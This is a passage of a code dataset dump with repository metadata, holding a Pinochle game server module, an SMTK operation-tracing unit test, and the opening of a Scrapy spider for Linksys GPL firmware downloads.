len(self.modes)\n if self._mode == 0:\n self._mode += 1\n\n\ndef deal_pinochle(player_ids: list, kitty_len: int = 0, kitty_id: str = None) -> None:\n \"\"\"\n Deal a deck of Pinochle cards into player's hands and the kitty.\n\n :param player_ids: [description]\n :type player_ids: list\n :param kitty_len: [description]\n :type kitty_len: int\n :param kitty_id: [description]\n :type kitty_id: str\n \"\"\"\n # TODO: Think about changing this to 'look' more like a traditional deal. One or\n # three cards dealt from the top of the stack, occassionally contribuing one to the\n # kitty, if applicable. It shouldn't make an actual difference, but...\n\n LOG.debug(\"player_ids=%s\", player_ids)\n hand_decks, kitty_deck = deal_hands(players=len(player_ids), kitty_cards=kitty_len)\n\n if kitty_len > 0 and kitty_id is not None:\n hand.addcards(hand_id=kitty_id, cards=convert_to_svg_names(kitty_deck))\n for index, __ in enumerate(player_ids):\n player_info: Optional[Player] = utils.query_player(player_ids[index])\n hand_id = str(player_info.hand_id) if player_info else utils.UUID_ZEROS\n hand.addcards(hand_id=hand_id, cards=convert_to_svg_names(hand_decks[index]))\n\n\ndef set_players_bidding(player_ids: list) -> None:\n \"\"\"\n Update each player's record to indicate they are participating in this round's\n bidding.\n\n :param player_ids: [description]\n :type player_ids: list\n \"\"\"\n LOG.debug(\"player_ids=%s\", player_ids)\n for player_id in player_ids:\n player.update(player_id, {\"bidding\": True})\n\n\ndef set_player_pass(player_id: str) -> None:\n \"\"\"\n Update supplied player's record to indicate they are no longer participating in this\n round's bidding.\n\n :param player_id: [description]\n :type player_id: str\n \"\"\"\n LOG.debug(\"set_playerplayer_id=%s\", player_id)\n player.update(player_id, {\"bidding\": False})\n\n\ndef players_still_bidding(round_id: str) -> List[str]:\n \"\"\"\n Returns list of player_ids still bidding in the supplied round.\n\n :param round_id: [description]\n :type round_id: str\n :return: List of player_ids\n :rtype: List[str]\n \"\"\"\n player_ids = roundteams.create_ordered_player_list(round_id)\n return [\n player_id for player_id in player_ids if utils.query_player(player_id).bidding\n ]\n\n\ndef submit_bid(round_id: str, player_id: str, bid: int):\n \"\"\"\n This function processes a bid submission for a player.\n\n :param round_id: Id of the round to delete\n :param player_id: Id of the player submitting the bid\n :return: 200 on successful delete, 404 if not found,\n 409 if requirements are not satisfied.\n \"\"\"\n LOG.debug(\"\\nround_id=%s, player_id=%s\", round_id, player_id)\n # Get the round requested\n a_round: Round = utils.query_round(str(round_id))\n a_player: Optional[Player] = utils.query_player(str(player_id))\n\n # Did we find a round?\n if a_round is None or a_round == {}:\n abort(404, f\"Round {round_id} not found.\")\n\n # Did we find a player?\n if a_player is None or a_player == {}:\n abort(404, f\"Player {player_id} not found.\")\n\n if bid != -1 and a_round.bid >= bid:\n # New bid must be higher than current bid.\n abort(409, f\"Bid {bid} is below current bid {a_round.bid}.\")\n\n # Determine the next player to bid this round.\n ordered_player_list = players_still_bidding(round_id)\n next_bid_player_idx = determine_next_bidder_player_id(\n player_id, ordered_player_list\n )\n\n # If the bid is still progressing, continue prompting.\n game_id = str(utils.query_gameround_for_round(round_id).game_id)\n if bid > 0:\n # Prompt that player to bid.\n send_bid_message(\n \"bid_prompt\",\n game_id,\n ordered_player_list[next_bid_player_idx],\n bid if bid > 0 else a_round.bid,\n )\n\n return round_.update(round_id, {\"bid\": bid, \"bid_winner\": player_id})\n\n ## Bid == -1\n # If supplied bid is -1, this indicates the player passed.\n set_player_pass(player_id)\n\n if len(ordered_player_list) == 2: # Now one since a player passed...\n send_bid_message(\n \"bid_winner\",\n game_id,\n ordered_player_list[next_bid_player_idx],\n a_round.bid,\n )\n # TODO: Figure out if this can possibly happen more than once. I don't think so,\n # but it would add another set of cards to the player's hand if it did.\n # Add the cards from the kitty, if any, to the player's hand.\n for hand_obj in utils.query_hand_list(str(utils.query_round(round_id).hand_id)):\n hand.addcard(\n str(\n utils.query_player(ordered_player_list[next_bid_player_idx]).hand_id\n ),\n hand_obj.card,\n )\n # Record the bid winner's ID\n round_.update(\n round_id, {\"bid_winner\": ordered_player_list[next_bid_player_idx]}\n )\n t_trick, _ = trick.create(round_id)\n trick.update(\n str(t_trick[\"trick_id\"]),\n {\"trick_starter\": ordered_player_list[next_bid_player_idx]},\n )\n # Step to the next game state.\n game.update(game_id, state=True)\n else:\n send_bid_message(\n \"bid_prompt\",\n game_id,\n ordered_player_list[next_bid_player_idx],\n bid if bid > 0 else a_round.bid,\n )\n\n return {}, 200\n\n\ndef finalize_meld(round_id: str, player_id: str):\n \"\"\"\n This function processes a meld finalize submission for a player.\n\n :param round_id: Id of the round to delete\n :param player_id: Id of the player submitting the meld\n :return: 200 on successful delete, 404 if not found,\n 409 if requirements are not satisfied.\n \"\"\"\n LOG.debug(\"finalize_meld: round_id=%s, player_id=%s\", round_id, player_id)\n # Get the round requested\n a_round: Round = utils.query_round(str(round_id))\n a_player: Optional[Player] = utils.query_player(str(player_id))\n\n # Did we find a round?\n if a_round is None or a_round == {}:\n abort(404, f\"Round {round_id} not found.\")\n\n # Did we find a player?\n if a_player is None or a_player == {}:\n abort(404, f\"Player {player_id} not found.\")\n\n # Gather all the players for this round.\n player_list = utils.query_player_ids_for_round(round_id)\n\n if player_id not in player_list:\n abort(404, f\"Player {player_id} not playing this round.\")\n\n player.update(player_id, {\"meld_final\": True})\n\n # Check to see if all players are ready for the next round.\n if all(utils.query_player(x).meld_final for x in player_list):\n # All meld is final\n total_team_scores(round_id)\n\n\ndef total_team_scores(round_id: str):\n \"\"\"\n All meld is final, total the team scores so far and update the database.\n\n :param round_id: Round ID in play\n :type round_id: str\n \"\"\"\n LOG.debug(\"finalize_bid: Totalling team scores\")\n\n ws_mess = WSM()\n game_id = str(utils.query_gameround_for_round(round_id).game_id)\n\n # Total each team's meld.\n for t_roundteam in utils.query_roundteam_list(round_id):\n team_id = str(t_roundteam.team_id)\n total = utils.query_team(team_id).score\n meld_score = sum(\n utils.query_player(t_player.player_id).meld_score\n for t_player in utils.query_teamplayer_list(team_id)\n )\n total += meld_score\n team.update(team_id, {\"score\": total})\n\n # Communicate team scores:\n message = {\n \"action\": \"team_score\",\n \"team_id\": team_id,\n \"score\": total,\n \"meld_score\": meld_score,\n }\n ws_mess.websocket_broadcast(game_id, message)\n\n # Advance the game mode.\n game.update(game_id, state=True)\n\n\ndef determine_next_bidder_player_id(player_id: str, ordered_player_list: List[str]):\n \"\"\"\n Determine the next player to bid this round.\n\n :param player_id: Player ID who bid last\n :type player_id: str\n :param ordered_player_list: Ordered list of players\n :type ordered_player_list: List[str]\n :raises IndexError: [description]\n :return: [description]\n :rtype: [type]\n \"\"\"\n try:\n next_bid_player_idx = ordered_player_list.index(player_id)\n next_bid_player_idx += 1\n next_bid_player_idx %= len(ordered_player_list)\n return next_bid_player_idx\n except IndexError as err:\n if not ordered_player_list:\n return 0\n raise IndexError(err) from err\n\n\ndef send_bid_message(message_type: str, game_id: str, player_id: str, bid: int):\n \"\"\"\n Send a websocket message to all players with a bid-related message with the\n information about the next bidder and current bid, or who has won the bid.\n\n :param message_type: Type of bid messsage\n :type message_type: str\n :param game_id: Game identifier\n :type game_id: str\n :param player_id: Player identifier\n :type player_id: str\n :param bid: Amount of bid\n :type bid: int\n \"\"\"\n # Prompt the next player to bid.\n ws_mess = WSM()\n message = {\n \"action\": message_type,\n \"player_id\": player_id,\n \"bid\": bid,\n }\n ws_mess.websocket_broadcast(game_id, message)\n\n\ndef set_trump(round_id: str, player_id: str, trump: str):\n \"\"\"\n This function processes trump submission by a player.\n\n :param round_id: Id of the round to delete\n :param game_id: Id of the player submitting the bid\n :return: 200 on successful delete, 404 if not found,\n 409 if requirements are not satisfied.\n \"\"\"\n LOG.debug(\"\\nround_id=%s, player_id=%s\", round_id, player_id)\n # Get the round requested\n a_round: Round = utils.query_round(str(round_id))\n a_player: Optional[Player] = utils.query_player(str(player_id))\n\n # Did we find a round?\n if a_round is None or a_round == {}:\n abort(404, f\"Round {round_id} not found.\")\n\n # Did we find a player?\n if a_player is None or a_player == {}:\n abort(404, f\"Player {player_id} not found.\")\n\n # New trump must not be already be set.\n LOG.debug(\"Bid winner=%s, player_id=%s\", a_round.bid_winner, player_id)\n if str(a_round.bid_winner) != player_id:\n LOG.debug(\"set_trump: Bid winner %s must submit trump.\", a_round.bid_winner)\n abort(409, f\"Bid winner {a_round.bid_winner} must submit trump.\")\n\n if \"{}s\".format(trump.capitalize()) not in SUITS:\n abort(409, f\"Trump suit must be one of {SUITS}.\")\n\n ws_mess = WSM()\n message = {\n \"action\": \"trump_selected\",\n \"trump\": trump,\n }\n game_id = str(utils.query_gameround_for_round(round_id).game_id)\n ws_mess.websocket_broadcast(game_id, message)\n\n # Step to next game state.\n game.update(game_id, state=True)\n return round_.update(round_id, {\"trump\": trump})\n\n\ndef start(round_id: str):\n \"\"\"\n This function starts a round if all the requirements are satisfied.\n\n :param round_id: Id of the round to commence.\n :return: 200 on successful delete, 404 if not found,\n 409 if requirements are not satisfied.\n \"\"\"\n LOG.info(\"In play_pinochle.start()\")\n LOG.debug(\"\\nround_id=%s\", round_id)\n\n # Get the round requested\n a_round: Round = utils.query_round(round_id)\n a_gameround: GameRound = utils.query_gameround_for_round(round_id)\n\n # Did we find a round?\n if not a_round:\n LOG.debug(\"Round %s not found.\", round_id)\n abort(404, f\"Round {round_id} not found.\")\n\n # Retrieve the information for the round and teams.\n round_t: list = utils.query_roundteam_list(round_id)\n\n # Did we find one or more round-team entries?\n if not round_t:\n LOG.debug(\"No teams found for round %s\", round_id)\n abort(409, f\"No teams found for round {round_id}.\")\n\n # Retrieve the information for the associated game.\n a_game: Game = utils.query_game(str(a_gameround.game_id))\n\n # Did we find a game?\n if a_game is None:\n LOG.debug(\"No game found for round %s\",round_id)\n abort(409, f\"No game found for round {round_id}.\")\n\n # Retrieve the hand_id for the kitty.\n kitty = str(a_round.hand_id)\n # Clear the kitty before dealing cards into that hand.\n hand.deleteallcards(kitty)\n\n # Collect the individual players from the round's teams.\n player_hand_id = {}\n for t_team_id in [str(x.team_id) for x in round_t]:\n for team_info in utils.query_teamplayer_list(t_team_id):\n # Generate new team hand IDs.\n new_hand_id = str(uuid.uuid4())\n player_hand_id[str(team_info.player_id)] = new_hand_id\n player.update(team_info.player_id, {\"hand_id\": new_hand_id})\n\n LOG.debug(\"kitty=%s\", kitty)\n LOG.debug(\"player_hand_id=%s\", player_hand_id)\n LOG.debug(\"player_hand_ids: %s\", list(player_hand_id.keys()))\n\n if not utils.query_trick_for_round_id(round_id):\n # Create new trick for the round\n trick.create(round_id)\n\n # Time to deal the cards.\n deal_pinochle(\n player_ids=list(player_hand_id.keys()),\n kitty_len=a_game.kitty_size,\n kitty_id=kitty,\n )\n\n # Reset player's flags to enable bidding.\n set_players_bidding(list(player_hand_id.keys()))\n\n game_id = str(a_gameround.game_id)\n\n # Determine the first player to bid this round.\n ordered_player_list = roundteams.create_ordered_player_list(round_id)\n first_bid_player_id = ordered_player_list[\n a_round.round_seq % len(ordered_player_list)\n ]\n\n ws_mess = WSM()\n message = {\n \"action\": \"bid_prompt\",\n \"player_id\": first_bid_player_id,\n \"bid\": a_round.bid,\n }\n ws_mess.websocket_broadcast(game_id, message)\n\n temp_state = utils.query_game(game_id).state\n message = {\n \"action\": \"game_start\",\n \"game_id\": game_id,\n \"state\": temp_state,\n }\n ws_mess = WSM()\n ws_mess.websocket_broadcast(game_id, message)\n return make_response(f\"Round {round_id} started.\", 200)\n\n\ndef score_hand_meld(round_id: str, player_id: str, cards: str):\n \"\"\"\n This function scores a player's meld hand given the list of cards.\n\n :param round_id: Id of the round to delete\n :param player_id: Id of the player\n :param cards: Comma separated list of cards submitted for meld.\n :return: 200 on successful scoring of cards, 404 if not found,\n 409 if scoring isn't successful.\n \"\"\"\n LOG.debug(\"round_id=%s\", round_id)\n # Get the round requested\n a_round: Round = utils.query_round(round_id)\n a_player: Optional[Player] = utils.query_player(player_id)\n game_id: str = str(utils.query_gameround_for_round(round_id).game_id)\n\n # Did we find a round?\n if a_round is None or a_round == {}:\n abort(404, f\"Round {round_id} not found.\")\n\n # Did we find the player?\n if a_player is None or a_player == {}:\n abort(409, f\"No player found for {player_id}.\")\n\n score = 0\n card_list = []\n if len(cards) > 2:\n # Associate the player with that player's hand.\n player_temp: Optional[Player] = utils.query_player(player_id=player_id)\n player_hand_id = str(player_temp.hand_id) if player_temp else utils.UUID_ZEROS\n player_hand = utils.query_hand_list(player_hand_id)\n player_hand_list = [x.card for x in player_hand]\n card_list = cards.split(\",\")\n\n LOG.debug(\"score_hand_meld: player_hand=%s\", player_hand_list)\n LOG.debug(\"score_hand_meld: card_list=%s\", card_list)\n\n for item in card_list:\n if item not in player_hand_list:\n abort(409, f\"Card {item} not in player's hand.\")\n\n # Convert from list of SVG card names to PinochleDeck list.\n cardclass_list = card_utils.convert_from_svg_names(card_list)\n\n # Set trump, if it's been declared (and recorded in the datatbase)\n temp_trump: str = \"{}s\".format(a_round.trump.capitalize())\n provided_deck = PinochleDeck(cards=cardclass_list)\n\n # Set trump on the newly created deck, if it's been declared\n if temp_trump in SUITS:\n LOG.debug(\"Called trump %s in %s.\", temp_trump, SUITS)\n provided_deck = card_utils.set_trump(temp_trump, provided_deck)\n\n # Score the deck supplied.\n score = score_meld.score(provided_deck)\n\n player.update(player_id=player_id, data={\"meld_score\": score})\n\n # Send card list and meld score to other players via Websocket\n message = {\n \"action\": \"meld_update\",\n \"game_id\": game_id,\n \"player_id\": player_id,\n \"card_list\": card_list,\n \"meld_score\": score,\n }\n ws_mess = WSM()\n ws_mess.websocket_broadcast(game_id, message, player_id)\n LOG.debug(\"score_hand_meld: score=%s\", score)\n return make_response(json.dumps({\"score\": score}), 200)\n\n\ndef new_round(game_id: str, current_round: str) -> Response:\n \"\"\"\n Cycle the game to a new round.\n\n :param game_id: The game receiving a new round.\n :type game_id: str\n :param current_round: The round being retired.\n :type current_round: str\n :return: Response to the web request originating the request.\n :rtype: Response\n \"\"\"\n # Deactivate soon-to-be previous round.\n prev_seq: int = utils.query_round(current_round).round_seq\n LOG.debug(\"new_round: prev_seq=%s\", prev_seq)\n prev_gameround: GameRound = utils.query_gameround(game_id, current_round)\n gameround.update(game_id, prev_gameround.round_id, {\"active_flag\": False})\n\n player_ids = utils.query_player_ids_for_round(str(prev_gameround.round_id))\n for player_id in player_ids:\n player.update(player_id, {\"meld_final\": False, \"meld_score\": 0})\n\n # Create new round and gameround\n temp_gameround, __ = round_.create(game_id)\n # Obtain the new round's ID.\n temp_round_id = temp_gameround[\"round_id\"]\n cur_roundteam: List[RoundTeam] = utils.query_roundteam_list(current_round)\n # Tie the current teams to the new round.\n roundteams.create(temp_round_id, [str(t.team_id) for t in cur_roundteam])\n # Increment the round_seq for the new round\n round_.update(temp_round_id, {\"round_seq\": prev_seq + 1})\n LOG.debug(\"new_round: new_seq=%s\", utils.query_round(temp_round_id).round_seq)\n\n # Create new trick for the round\n trick.create(temp_round_id)\n\n # Start the new round.\n return start(temp_round_id)\n\n\ndef start_next_trick(round_id: str, player_id: str) -> Response:\n \"\"\"\n Create a new trick setting player_id as the 'bid winner'.\n\n :param round_id: The round in play.\n :type round_id: str\n :param player_id: The player initiating the continue instruction.\n :type player_id: str\n :return: Response to the web request originating the request.\n :rtype: Response\n \"\"\"\n LOG.debug(\"\\nIn start_next_trick: round_id=%s\", round_id)\n # Get the round requested\n a_round: Round = utils.query_round(round_id)\n round_player_list: List[str] = utils.query_player_ids_for_round(round_id)\n\n # Did we find a round?\n if a_round is None or a_round == {}:\n abort(404, f\"Round {round_id} not found.\")\n\n # Did we find the player?\n if player_id not in round_player_list:\n abort(409, f\"No player found for {player_id}.\")\n\n # Create the next trick.\n t_trick, _ = trick.create(round_id)\n trick.update(str(t_trick[\"trick_id\"]), {\"trick_starter\": player_id})\n\n # Send notice of new trick to all players via Websocket\n game_id: str = str(utils.query_gameround_for_round(round_id).game_id)\n message = {\n \"action\": \"trick_next\",\n \"game_id\": game_id,\n \"player_id\": player_id,\n }\n ws_mess = WSM()\n ws_mess.websocket_broadcast(game_id, message)\n\n return make_response(\"Start next trick\", 200)\n\n\ndef reorder_players(round_id: str, winner_id: str) -> List[str]:\n \"\"\"\n Create ordered list of players starting with the player_id supplied.\n\n :param round_id: The round in play.\n :type round_id: str\n :param winner_id: Player ID of the bid or trick winner.\n :type winner_id: str\n :return: List of player_ids in order starting with the bid or trick winner\n :rtype: List[str]\n \"\"\"\n round_player_id_list = utils.query_player_ids_for_round(round_id)\n\n # Locate the index of the winner in the player list\n starting_index = round_player_id_list.index(winner_id)\n LOG.debug(\"reorder_players: starting_index=%s\", starting_index)\n\n # Generate a list of indices for the players, starting with the\n # player id passed in as winner_id.\n player_list_len = len(round_player_id_list)\n ordered_player_index_list = [\n (x + starting_index) % player_list_len for x in range(player_list_len)\n ]\n return [round_player_id_list[x] for x in ordered_player_index_list]\n\n\ndef play_trick_card(round_id: str, player_id: str, card: str) -> Response:\n \"\"\"\n Accept a card played by player for current trick.\n\n :param round_id: The round in play.\n :type round_id: str\n :return: Response to the web request originating the request.\n :rtype: Response\n \"\"\"\n LOG.debug(\"\\nplay_trick_card: round_id=%s\", round_id)\n # Get the round requested\n a_round: Round = utils.query_round(round_id)\n a_player: Optional[Player] = utils.query_player(player_id)\n game_id: str = str(utils.query_gameround_for_round(round_id).game_id)\n\n # Did we find a round?\n if a_round is None or a_round == {}:\n abort(404, f\"Round {round_id} not found.\")\n\n # Did we find the player?\n if a_player is None or a_player == {}:\n abort(409, f\"No player found for {player_id}.\")\n\n # Retrieve trick data\n a_trick: Trick = utils.query_trick_for_round_id(round_id)\n if a_trick is None or a_trick == {}:\n LOG.debug(\n \"play_trick_card: utils.query_all_tricks()=%s\", utils.query_all_tricks()\n )\n abort(409, f\"Trick could not be found for round {round_id}.\")\n\n # Associate the player with that player's hand.\n player_temp: Optional[Player] = utils.query_player(player_id=player_id)\n player_hand_id: str = str(player_temp.hand_id) if player_temp else utils.UUID_ZEROS\n player_hand: List[Hand] = utils.query_hand_list(player_hand_id)\n player_hand_list: List[str] = [x.card for x in player_hand]\n\n LOG.debug(\"play_trick_card: player_hand=%s\", player_hand_list)\n\n if card not in player_hand_list:\n abort(409, f\"Card {card} not in player's hand.\")\n\n # TODO: Make sure the player hasn't already sent a card for this trick.\n\n # Determine the order of the players\n ordered_player_id_list: List[str] = reorder_players(\n str(round_id), str(a_trick.trick_starter)\n )\n\n # Obtain trick hand ID\n trick_hand_id = str(a_trick.hand_id)\n\n # Add card to trick deck\n hand.addcard(trick_hand_id, card, ordered_player_id_list.index(player_id))\n # Remove card from player's hand\n hand.deletecard(player_hand_id, card)\n\n # Send played card to other players via Websocket\n message = {\n \"action\": \"trick_card\",\n \"game_id\": game_id,\n \"player_id\": player_id,\n \"card\": card,\n }\n ws_mess = WSM()\n ws_mess.websocket_broadcast(game_id, message, player_id)\n\n # Determine if the trick is complete (all players submitted cards) and if so, declare\n # trick winner.\n trick_hand_list: List[Hand] = utils.query_hand_list(trick_hand_id)\n\n LOG.debug(\"play_trick_card: trick_hand_list=%s\", trick_hand_list)\n if len(trick_hand_list) == len(ordered_player_id_list):\n LOG.debug(\"play_trick_card: trick_hand_list=%s\", trick_hand_list)\n winning_card: str = find_winning_trick_card(\n trick_hand_list, f\"{a_round.trump.capitalize()}s\"\n )\n LOG.debug(\"play_trick_card: Winning card: %s\", winning_card)\n winning_card_index = -1\n LOG.debug(\"play_trick_card: Trick cards: %s\", [x.card for x in trick_hand_list])\n LOG.debug(\n \"play_trick_card: Determining winning card index for %s:\", winning_card\n )\n for index, t_hand in enumerate(trick_hand_list):\n LOG.debug(\"play_trick_card: index: %s = %s\", index, t_hand.card)\n if winning_card == t_hand.card:\n winning_card_index = index\n break\n assert winning_card_index != -1\n LOG.debug(\"play_trick_card: winning_card_index=%s\", winning_card_index)\n\n # Determine the player_id who won the trick and their team_id.\n winning_player_id: str = ordered_player_id_list[winning_card_index]\n a_roundteam_list = utils.query_roundteam_list(round_id)\n team_id_list = [x.team_id for x in a_roundteam_list]\n winning_team_id = None\n for team_id in team_id_list:\n if winning_player_id in [\n str(x.player_id) for x in utils.query_teamplayer_list(team_id)\n ]:\n winning_team_id = team_id\n assert winning_team_id\n winning_team_hand_id = str(\n utils.query_roundteam(round_id, winning_team_id).hand_id\n )\n LOG.debug(\"play_trick_card: Winning player: %s\", winning_player_id)\n\n # Copy the cards in the trick hand to the winning player's team's hand.\n for a_hand in trick_hand_list:\n hand.addcard(winning_team_hand_id, a_hand.card)\n # Update the trick winner in the database\n trick.update(str(a_trick.trick_id), {\"trick_winner\": winning_player_id})\n\n # Check to see if a player has cards left in their hand.\n if hand.read_one(player_hand_id):\n LOG.debug(\"play_trick_card: Sending trick_won message.\")\n # Send played card to other players via Websocket\n message = {\n \"action\": \"trick_won\",\n \"game_id\": game_id,\n \"player_id\": winning_player_id,\n \"winning_card\": winning_card,\n }\n ws_mess = WSM()\n ws_mess.websocket_broadcast(game_id, message)\n else:\n LOG.debug(\"play_trick_card: Calling notify_round_complete.\")\n # The last trick for this round has been played.\n notify_round_complete(game_id, round_id, winning_player_id, winning_team_id)\n LOG.debug(\"Exiting play_trick_card, when trick is complete.\")\n\n return make_response(\"Card accepted\", 200)\n\n\ndef find_winning_trick_card(trick_card_list: List[Hand], trump: str) -> str:\n \"\"\"\n Determine the card in the list which wins the trick, based on trump. The card list is\n ordered such that the card that was 'led' is in position 0.\n\n :param trick_card_list: Ordered list of Hand classes.\n :type trick_card_list: List[Hand]\n :param trump: The suit designated as trump for this round.\n :type trump: str\n :return: The card that won the trick.\n :rtype: str\n \"\"\"\n # Convert the list of cards (in Hand classes) to PinochleDeck\n temp_deck = card_utils.convert_from_svg_names([x.card for x in trick_card_list])\n trick_deck = card_utils.set_trump(trump, temp_deck)\n\n # If nothing else beats it, the card led for the trick wins.\n winning_card = trick_deck[0]\n suit_led = winning_card.suit\n\n for card in trick_deck:\n LOG.debug(\"card=%s - winning_card=%s - trump=%s\", card, winning_card, trump)\n if winning_card == card:\n LOG.debug(\"%s == %s\", winning_card, card)\n continue\n if card.suit == trump and winning_card.suit != trump:\n LOG.debug(\n \"%s == %s and %s != %s\", card.suit, trump, winning_card.suit, trump\n )\n winning_card = card\n suit_led = winning_card.suit\n continue\n if card.suit == suit_led and card > winning_card:\n LOG.debug(\n \"%s == %s and %s > %s\",\n card.suit,\n suit_led,\n card.value,\n winning_card.value,\n )\n winning_card = card\n continue\n\n return card_utils.convert_to_svg_name(winning_card)\n\n\ndef notify_round_complete(\n game_id: str, round_id: str, winning_player_id: str, winning_team_id: str\n):\n \"\"\"\n The last trick for this round has been played. Tally the scores and notify players.\n\n :param game_id: ID of the game being played\n :type game_id: str\n :param round_id: ID of the round of that game\n :type round_id: str\n :param winning_player_id: The ID of the player who won the last trick.\n :type winning_player_id: str\n \"\"\"\n LOG.debug(\"In notify_round_complete.\")\n # Collect data needed for notification.\n a_roundteam_list = utils.query_roundteam_list(round_id)\n team_id_list = [str(x.team_id) for x in a_roundteam_list]\n t_hand_id_list = [str(x.hand_id) for x in a_roundteam_list]\n\n # Score the team hands\n trick_score = {}\n assert t_hand_id_list\n LOG.debug(\"notify_round_complete: t_hand_id_list=%s\", t_hand_id_list)\n for index, h_id in enumerate(t_hand_id_list):\n hand_h_id = hand.read_one(h_id)\n if hand_h_id:\n trick_score[team_id_list[index]] = score_tricks.score(\n card_utils.convert_from_svg_names(hand_h_id[\"cards\"])\n )\n if str(team_id_list[index]) == str(winning_team_id):\n trick_score[team_id_list[index]] += 1\n LOG.debug(\n \"notify_round_complete: Score for team %s: %s\",\n team_id_list[index],\n trick_score[team_id_list[index]],\n )\n else:\n LOG.debug(\"notify_round_complete: Zero score %s/%s\", index, h_id)\n trick_score[team_id_list[index]] = 0\n\n # Update the overall team scores\n # FIXME: Handle case where bid winner's team doesn't make the bid.\n team_scores = {}\n for t_id in team_id_list:\n a_team = utils.query_team(t_id)\n score = a_team.score + trick_score[t_id]\n team.update(t_id, {\"score\": score})\n team_scores[t_id] = score\n\n # Notify the players of the final trick score.\n message = {\n \"action\": \"score_round\",\n \"game_id\": game_id,\n \"player_id\": winning_player_id,\n \"team_trick_scores\": trick_score,\n \"team_scores\": team_scores,\n }\n LOG.debug(\"notify_round_complete: Sending WSM to clients. %s\", message)\n ws_mess = WSM()\n ws_mess.websocket_broadcast(game_id, message)\n LOG.debug(\"Exiting notify_round_complete.\")\n","repo_name":"kronenpj/pinochle","sub_path":"src/pinochle/play_pinochle.py","file_name":"play_pinochle.py","file_ext":"py","file_size_in_byte":32065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"74667488473","text":"import os\n\nimport unittest\nimport smtk\nimport smtk.attribute\nimport smtk.attribute_builder\nimport smtk.extension.paraview.appcomponents\nimport smtk.io\nimport smtk.operation\nimport smtk.session.vtk\nimport smtk.resource\nimport smtk.testing\nimport re\nfrom smtk.operation import configureAttribute\nfrom smtk.extension.paraview.appcomponents import pqSMTKPythonTrace\n\nOP_SUCCEEDED = int(smtk.operation.Operation.Outcome.SUCCEEDED)\n\nSBT = \"\"\"\n\n\n \n \n \n \n 0\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n 0.0\n \n \n \n \n \n \n 1\n \n 2\n \n conditional-double\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n\"\"\"\n\nPATH = 'path'\nVALUE = 'value'\nSPEC = {\n 'associations': [{'resource': 'model'}],\n 'items': [\n {PATH: 'string-item', VALUE: 'xyzzy'},\n {PATH: '/double-item', VALUE: [3.14159, None, 2.71828]},\n {PATH: 'int-item', 'enabled': True, VALUE: 2},\n {PATH: 'int-item/conditional-double', VALUE: 42.42},\n {PATH: 'comp-item', VALUE: [\n {'resource': 'model', 'component': 'casting'},\n {'resource': 'model', 'component': 'symmetry'},\n ]},\n {PATH: '/group-item', 'count': 2},\n {PATH: '/group-item/0/subgroup-double', VALUE: 73.73},\n {PATH: '/group-item/1/subgroup-double', VALUE: 83.83},\n ]\n}\n\n\nclass TestOp(smtk.operation.Operation):\n\n def __init__(self):\n smtk.operation.Operation.__init__(self)\n\n def name(self):\n return \"test op\"\n\n def operateInternal(self):\n smtk.WarningMessage(self.log(), 'My string is \\\"%s\\\"' %\n self.parameters().findString('string-item').value())\n\n # Return with success\n result = self.createResult(smtk.operation.Operation.Outcome.SUCCEEDED)\n # result.findString('my string').setValue(\n # self.parameters().findString('my string').value())\n return result\n\n def createSpecification(self):\n spec = smtk.attribute.Resource.New()\n reader = smtk.io.AttributeReader()\n err = reader.readContents(spec, SBT, self.log())\n\n if err:\n print(self.log().convertToString())\n\n return spec\n\n\nclass TestOperationTracing(smtk.testing.TestCase):\n def import_model(self):\n \"\"\"Import a model resource to test operation tracing.\"\"\"\n gen_path = os.path.join(smtk.testing.DATA_DIR,\n 'model/3d/genesis/filling1.gen')\n import_op = smtk.session.vtk.Import.create()\n import_op.parameters().findFile('filename').setValue(gen_path)\n # Demonstrate/test use of safeOperate() instead of operate():\n resource = None\n\n def handler(op, result):\n nonlocal resource\n resource = smtk.model.Resource.CastTo(\n result.find('resource').value())\n outcome = import_op.safeOperate(handler)\n print('Outcome = ', outcome)\n self.assertEqual(outcome, smtk.operation.Operation.Outcome.SUCCEEDED,\n 'Failed to import model file {}'.format(gen_path))\n print('Resource is ', resource)\n return resource\n\n def test_operation_tracing(self):\n model_resource = self.import_model()\n\n op = TestOp.create(__name__, \"TestOp\", 1)\n parameters = op.parameters()\n\n builder = smtk.attribute_builder.AttributeBuilder()\n resource_dict = dict(model=model_resource)\n SPEC['resources'] = resource_dict\n # use the method that will be produced by python tracing.\n configureAttribute(parameters, SPEC)\n # check it did something.\n assert (parameters.find('int-item').value() == 2)\n\n # now check that we are able to trace the operation\n tracer = pqSMTKPythonTrace()\n op_trace = tracer.traceOperation(op, testing=True)\n print(\"operation trace:\\n\", op_trace)\n # non-default items should be traced.\n assert (op_trace.find(\n \"'path': 'double-item', 'value': [ 3.1415899999999999, None, 2.71828 ]\") > 0)\n assert (op_trace.find(\n \"'path': 'int-item/conditional-double', 'value': 42.42\") > 0)\n assert (op_trace.find(\"'resource': 'filling1', 'component': 'casting'\") > 0)\n assert (op_trace.find(\"'resource': 'filling1', 'component': 'symmetry'\") > 0)\n assert (op_trace.find(\"'path': 'group-item', 'count': 2\") > 0)\n assert (op_trace.find(\n \"'path': 'group-item/0/subgroup-double', 'value': 73.73\") > 0)\n assert (op_trace.find(\n \"'path': 'group-item/1/subgroup-double', 'value': 83.829\") > 0)\n\n\nif __name__ == '__main__':\n smtk.testing.process_arguments()\n unittest.main()\n","repo_name":"Kitware/SMTK","sub_path":"smtk/operation/testing/python/testOperationTracing.py","file_name":"testOperationTracing.py","file_ext":"py","file_size_in_byte":6672,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"5"} +{"seq_id":"37269254499","text":"from typing import Generator, Tuple\n\nfrom scrapy import Request, Spider\nfrom scrapy.http import Response\nfrom scrapy.loader import ItemLoader\n\nfrom firmware.items import FirmwareItem\n\n\nclass LinksysGPL(Spider):\n handle_httpstatus_list = [404]\n name = 'linksys_gpl'\n\n allowed_domains = [\n 'www.linksys.com',\n 'downloads.linksys.com'\n ]\n\n start_urls = [\n 'https://www.linksys.com/de/support-article?articleNum=114663',\n ]\n\n whitelist_enabled = True\n\n whitelist = ['EA7500']\n\n download_maxsize = 2147483648 # 2GiB\n\n XPATH = {\n 'table_rows': '//table/thead/tr',\n 'row_columns': './/td',\n }\n\n def parse(self, response: Response, **kwargs: {}) -> Generator[Request, None, None]:\n firmware_extractor = 